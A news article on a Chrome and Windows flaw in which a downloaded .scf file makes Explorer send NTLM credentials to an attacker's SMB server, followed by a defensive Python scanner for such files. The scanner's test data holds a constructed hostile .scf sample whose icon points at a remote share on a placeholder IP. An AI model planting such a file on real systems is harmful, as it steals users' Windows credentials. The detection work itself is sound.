A Google Chrome vulnerability allows hackers to steal people’s Windows login credentials and launch SMB (Server Message Block) relay attacks, according to security experts. The attack technique that enables the credential theft is a combination of two older techniques, one borrowed from the Stuxnet campaign and the other from a technique demonstrated at a Black Hat conference by two security researchers.
The Google Chrome vulnerability was uncovered by DefenseCode security engineer Bosko Stankovic, who said in a blog post that he found the flaw in a default configuration of Chrome running on Windows 10.
He added that this vulnerability poses a threat not just to privileged users such as administrators but also to regular users and organisations, since “it enables the attacker to impersonate members of the organisation”. Hackers can also “immediately reuse” stolen credentials and privileges gained to launch further attacks “on other users or gain access and control of IT resources”.
DefenseCode said it had not informed Google about the vulnerability. However, Google told Threatpost that it was aware of the issue and “taking necessary action.”
According to Stankovic, the attack is simple and involves victims being tricked into clicking on a malicious link, which triggers an automatic download of a Windows Explorer Shell Command File, or SCF file. The SCF file lies dormant until the victim opens the download folder, at which point Windows Explorer tries to load the icon the file references from the hacker’s server. That connection hands the attacker the victim’s username and hashed password.
Threatpost cited independent security researchers as having noted that this flaw is not exclusively tied to how Chrome deals with SCF files; it also relates to how Windows handles SCF files.
“Organisations that allow remote access to services such as Microsoft Exchange (Outlook Anywhere) and use NTLM as authentication method, may be vulnerable to SMB relay attacks, allowing the attacker to impersonate the victim, accessing data and systems without having to crack the password,” Stankovic warned.
.SCF file + SMB Protocol + Google Chrome
The file type at the centre of the attack is the Windows Explorer Shell Command File (.scf file). It supports a few Windows Explorer commands, such as showing the desktop or opening a Windows Explorer window. A .scf file stored on disk retrieves an icon file whenever it is displayed in a Windows Explorer window.
Serbian security researcher Bosko Stankovic of DefenseCode combined these two building blocks, the SMB protocol and the .scf file format, to devise a new type of hacking attack.
A .scf file can be used to trick Windows into authenticating to a remote SMB server. This is what the contents of the file look like:
After a user downloads the file to the system, it is triggered as soon as the download folder is opened to view it. Note that the user does not need to click or open the file; Windows File Explorer automatically attempts to load the icon.
The rest of the work is done by the remote SMB server, which is set up by the attacker. The server is ready to capture the user’s username and NTLMv2 password hash, which can be cracked offline. The server can also be configured to relay this connection to an external service that accepts such credentials.
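The two paragraphs above describe the whole trigger: a downloaded .scf file whose icon entry points at a remote SMB host, loaded by Explorer without any click. A defender's first check is therefore to look through a downloads folder for .scf files whose icon reference is a UNC path (or smb:// URL) to a host that is not the local machine. The script below is an added example written for this article, not code from DefenseCode, Google or Microsoft. It assumes the documented INI-style layout of .scf files (a [Shell] section with Command and IconFile keys); the two sample file bodies and the host address in them are constructed for illustration.

```python
"""Flag .scf files whose IconFile entry points at a remote SMB host.

Added example for this article (not DefenseCode's or Chrome's code). The
[Shell] / IconFile key names are the documented .scf layout; the sample
bodies and the 203.0.113.10 address below are constructed test data.
"""
import re
from pathlib import Path

# Constructed samples: a benign "show desktop" file with a local icon, and one
# whose icon lives on a remote share (the pattern described in the article).
SAMPLES = {
    "show_desktop.scf": (
        "[Shell]\r\nCommand=2\r\nIconFile=explorer.exe,3\r\n"
        "[Taskbar]\r\nCommand=ToggleDesktop\r\n"
    ),
    "invoice.scf": (
        "[Shell]\r\nCommand=2\r\nIconFile=\\\\203.0.113.10\\share\\icon.ico\r\n"
        "[Taskbar]\r\nCommand=ToggleDesktop\r\n"
    ),
}

LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}
UNC_RE = re.compile(r"^\\\\([^\\/]+)[\\/]")          # \\host\share\...
URL_RE = re.compile(r"^(?:smb|file)://([^/]+)/", re.I)  # smb://host/...


def parse_scf(text):
    """Parse an INI-style .scf body into {section: {key: value}}.

    Sections and keys are lower-cased so lookups are case-insensitive;
    blank and comment lines are skipped, as Explorer does.
    """
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def remote_icon_host(icon_value):
    """Return the remote host an IconFile value targets, or None if local."""
    if icon_value is None:
        return None
    # IconFile may carry a trailing ",<index>" selecting an icon inside the file.
    target = icon_value.rsplit(",", 1)[0].strip().strip('"')
    match = UNC_RE.match(target) or URL_RE.match(target)
    if not match:
        return None
    host = match.group(1).lower()
    return None if host in LOCAL_HOSTS else host


def scan_scf_files(files):
    """files: mapping of file name -> text. Returns [(name, remote_host), ...]."""
    findings = []
    for name, text in files.items():
        if not name.lower().endswith(".scf"):
            continue
        shell = parse_scf(text).get("shell", {})
        host = remote_icon_host(shell.get("iconfile"))
        if host:
            findings.append((name, host))
    return findings


def scan_directory(path):
    """Read every .scf under a folder on disk and run the same check."""
    files = {}
    for p in Path(path).rglob("*.scf"):
        try:
            files[str(p)] = p.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue
    return scan_scf_files(files)


if __name__ == "__main__":
    for name, host in scan_scf_files(SAMPLES):
        print(f"{name}: Explorer would fetch its icon from remote host {host}")
```

Run against a real downloads folder with `scan_directory(r"C:\Users\<user>\Downloads")`; any hit means that merely opening the folder in Explorer would send an NTLM authentication attempt to the listed host, which is exactly the step the article's attack depends on. The check deliberately treats `file://` URLs and UNC paths alike, since both resolve to an SMB fetch.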